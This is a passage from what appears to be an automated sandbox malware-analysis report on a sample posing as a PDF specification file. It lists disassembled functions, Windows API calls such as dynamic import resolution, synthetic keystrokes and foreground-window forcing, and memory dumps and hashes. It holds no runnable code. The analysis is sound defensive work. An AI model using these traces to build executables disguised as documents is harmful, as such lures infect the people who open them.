                                      • Instruction Fuzzy Hash: 57413A705046518FDB26CF14C484F1ABBE0AF45308F1989ACE99A4B762D772E849CF52
                                      Function 00365DFD Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00367EEB: GetStartupInfoW.KERNEL32(?), ref: 00367EF5
                                      • GetCommandLineW.KERNEL32(003F6C70,00000014), ref: 00365E9D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CommandInfoLineStartup
                                      • String ID:
                                      • API String ID: 582193876-0
                                      • Opcode ID: 9ddbf65577be3c7ef3d51b837037e5ec18c67087baa05c2e7e68fc1f730aa886
                                      • Instruction ID: bd64d7302233c97d28072c363ca772d64044f2ef9b33e2d0f0ad81d90169b1f8
                                      • Opcode Fuzzy Hash: 9ddbf65577be3c7ef3d51b837037e5ec18c67087baa05c2e7e68fc1f730aa886
                                      • Instruction Fuzzy Hash: 3521C170644B01CADB337BB09906BAA22A45F10705F15C47AF608DE1CFEFBA8A4086A5
                                      Function 003441A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00344214: FreeLibrary.KERNEL32(00000000,?), ref: 00344247
                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003439FE,?,00000001), ref: 003441DB
                                        • Part of subcall function 00344291: FreeLibrary.KERNEL32(00000000), ref: 003442C4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load
                                      • String ID:
                                      • API String ID: 2391024519-0
                                      • Opcode ID: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                      • Instruction ID: 4a53259bae3e94d5973cc2a1933e9ec285647a9e29df0ce6119266d1f56be60a
                                      • Opcode Fuzzy Hash: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                      • Instruction Fuzzy Hash: C3119131600306AADB12AF64DC06FAEB7E99F40704F108839B596AE1C1DAB0EA019B60
                                      Function 003B9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: bf351bd0e88226d590a329d825818db77224d635940c0a8acbae044e08b6ff0d
                                      • Instruction ID: e8e46a508d30d28be1e8a3a0f213303849dbf69df362916e65095733b2bdddaf
                                      • Opcode Fuzzy Hash: bf351bd0e88226d590a329d825818db77224d635940c0a8acbae044e08b6ff0d
                                      • Instruction Fuzzy Hash: 482105705086018FDB2ADF68C444F2ABBF1BF85305F154968EA9A4B672D732F849CF52
                                      Function 0036395C Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                        • Part of subcall function 0036821F: GetModuleFileNameW.KERNEL32(00000000,00400312,00000104,00000000,00000001,00000000), ref: 003682B1
                                        • Part of subcall function 00361145: ExitProcess.KERNEL32 ref: 00361154
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AllocateExitFileHeapModuleNameProcess
                                      • String ID:
                                      • API String ID: 1715456479-0
                                      • Opcode ID: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                      • Instruction ID: 1b835ed1e0892a040fdc324af367b75f3a70c1d7723df7ddb4bef3d5a4496868
                                      • Opcode Fuzzy Hash: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                      • Instruction Fuzzy Hash: 740192312456119AE6233B25DC52B2A23989F82764F668129F5059F19ADFB09D008AA4
                                      Function 00344252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,003439FE,?,00000001), ref: 00344286
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                      • Instruction ID: ec1b4338cb55a84b8ac311628bfcc447754d681fa04ed7c35a3a13358e10eea5
                                      • Opcode Fuzzy Hash: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                      • Instruction Fuzzy Hash: 47F01571505702CFCB369F64D890916BBF8AF043253258E3EF1D68AA20C7B2A940DB50
                                      Function 003440A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                      • Instruction ID: e72b43b52f49486ea24cd74f53a5807249b9cea5c9b846ecdcf35404df50c3f4
                                      • Opcode Fuzzy Hash: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                      • Instruction Fuzzy Hash: 55E072326002241BC712A658CC42FEA73ACDF887A0F0900B0F908EB208DAA0A9818690
                                      Function 003BB31E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 003BB32A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PathTemp
                                      • String ID:
                                      • API String ID: 2920410445-0
                                      • Opcode ID: 1a2c66320ee2d74bdfa39a8934756a69be963a306ee7c9dab24bf8ad936b0633
                                      • Instruction ID: 1f352cfec4b577893783c362b79e75336e9fbe2815b6dc0c67ac3343e959161d
                                      • Opcode Fuzzy Hash: 1a2c66320ee2d74bdfa39a8934756a69be963a306ee7c9dab24bf8ad936b0633
                                      • Instruction Fuzzy Hash: D6C04CB0501A5A9BD6539B50CD959F8776C9B00B05F0400E56205E5560DA706B818F11
                                      Function 0035ED18 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 1b33f636a489534e9f272f4cd10c3eb9792c70344f2f4ff0065624850fdaaf2c
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: A4310470A00105DFC71ADF18C490A69FBF6FF49341B6586A5E819CB666DB30EEC5CB80
                                      Function 020E229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 020E22B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 497343ca0ce80a313152849f22ec9c5d49718037a72df7e27d38f8c8aa7549da
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: 36E0BF7494020EEFDB00EFA4D5496DE7BB4EF04312F1005A5FD05D7680DB309E549A62
                                      Function 020E22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 020E22B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 20c1c9c3a699210a72cff74d408814a40b56f0b1838b94129548a427d99a605c
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 1EE0E67494020EEFDB00EFB4D54969E7FB4EF04302F100165FD01D2280D6309D509A72

                                      Non-executed Functions

                                      Function 0036123A Relevance: 105.2, APIs: 30, Strings: 30, Instructions: 173libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00367F51
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00367F65
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00367F78
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00367F8B
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00367F9E
                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00367FB1
                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00367FC4
                                      • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00367FD7
                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00367FEA
                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00367FFD
                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00368010
                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00368023
                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00368036
                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00368049
                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0036805C
                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0036806F
                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00368082
                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00368095
                                      • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 003680A8
                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003680BB
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003680CE
                                      • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 003680E1
                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 003680F4
                                      • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 00368107
                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0036811A
                                      • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 0036812D
                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 00368140
                                      • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 00368153
                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00368166
                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00368179
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                      • API String ID: 667068680-6251324
                                      • Opcode ID: 8444a0105ff384f2d43a955caf0fe93b7b2cddd97825f7569fe4e3e7d09ca5d6
                                      • Instruction ID: 28ccae217e1b5c27cf317f45cdc1b9e818b199dee3a7175fcef28706ef454a2f
                                      • Opcode Fuzzy Hash: 8444a0105ff384f2d43a955caf0fe93b7b2cddd97825f7569fe4e3e7d09ca5d6
                                      • Instruction Fuzzy Hash: 655108B1950668AAC702AFB5EE49E66BBACBB55B01744086FF104E35B0D7F4A400CF96
                                      Function 003AF7FF Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 003AF87D
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AF8DC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003AF919
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AF940
                                      • SendMessageW.USER32 ref: 003AF966
                                      • GetKeyState.USER32(00000011), ref: 003AF9F3
                                      • GetKeyState.USER32(00000009), ref: 003AFA00
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003AFA16
                                      • GetKeyState.USER32(00000010), ref: 003AFA20
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003AFA4F
                                      • SendMessageW.USER32 ref: 003AFA72
                                      • SendMessageW.USER32(?,00001030,?,003AE059), ref: 003AFB6F
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 003AFB85
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003AFB96
                                      • SetCapture.USER32(?), ref: 003AFB9F
                                      • ClientToScreen.USER32(?,?), ref: 003AFC03
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003AFC0F
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 003AFC29
                                      • ReleaseCapture.USER32 ref: 003AFC34
                                      • GetCursorPos.USER32(?), ref: 003AFC69
                                      • ScreenToClient.USER32(?,?), ref: 003AFC76
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFCD8
                                      • SendMessageW.USER32 ref: 003AFD02
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFD41
                                      • SendMessageW.USER32 ref: 003AFD6C
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003AFD84
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003AFD8F
                                      • GetCursorPos.USER32(?), ref: 003AFDB0
                                      • ScreenToClient.USER32(?,?), ref: 003AFDBD
                                      • GetParent.USER32(?), ref: 003AFDD9
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 003AFE3F
                                      • SendMessageW.USER32 ref: 003AFE6F
                                      • ClientToScreen.USER32(?,?), ref: 003AFEC5
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003AFEF1
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 003AFF19
                                      • SendMessageW.USER32 ref: 003AFF3C
                                      • ClientToScreen.USER32(?,?), ref: 003AFF86
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003AFFB6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003B004B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3780918311-4164748364
                                      • Opcode ID: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                      • Instruction ID: 7e48fa315b0cefec426e224899ffbba37cadd92e0af3166b25bdd3c9c9591bb4
                                      • Opcode Fuzzy Hash: 47a5629e018a1a254a852d665897c0028f442a72b037f5d84ef07854100d935f
                                      • Instruction Fuzzy Hash: E632CC74604244AFDB22CFA4C884FAABBA8FF4A354F140A39F695872B1C731EC55CB51
                                      Function 003AAACE Relevance: 56.6, APIs: 31, Strings: 1, Instructions: 574windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 003AB1CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: e5560f5dfe999fb6f4a7ee08ef2a47aafc80f46afacdce8f1e6aeeae4321f9ad
                                      • Instruction ID: 0676c6f2c52ec27a23e5dd4b82adc61f65f349e0f1ce251bd16dc7c1dda97a8b
                                      • Opcode Fuzzy Hash: e5560f5dfe999fb6f4a7ee08ef2a47aafc80f46afacdce8f1e6aeeae4321f9ad
                                      • Instruction Fuzzy Hash: F512BF71500608AFEB269F64CC49FAEBBB8FF46710F114229F915DB2E1DB709941CB11
                                      Function 0035EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000), ref: 0035EB4A
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003B3AEA
                                      • IsIconic.USER32(000000FF), ref: 003B3AF3
                                      • ShowWindow.USER32(000000FF,00000009), ref: 003B3B00
                                      • SetForegroundWindow.USER32(000000FF), ref: 003B3B0A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003B3B20
                                      • GetCurrentThreadId.KERNEL32 ref: 003B3B27
                                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003B3B33
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B44
                                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003B3B4C
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 003B3B54
                                      • SetForegroundWindow.USER32(000000FF), ref: 003B3B57
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B6C
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3B77
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B81
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3B86
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B8F
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3B94
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 003B3B9E
                                      • keybd_event.USER32(00000012,00000000), ref: 003B3BA3
                                      • SetForegroundWindow.USER32(000000FF), ref: 003B3BA6
                                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 003B3BCD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: f1d6193d5d3c0441805c0b0dd19f4ca616d91dd1951045c02b1997f879af7722
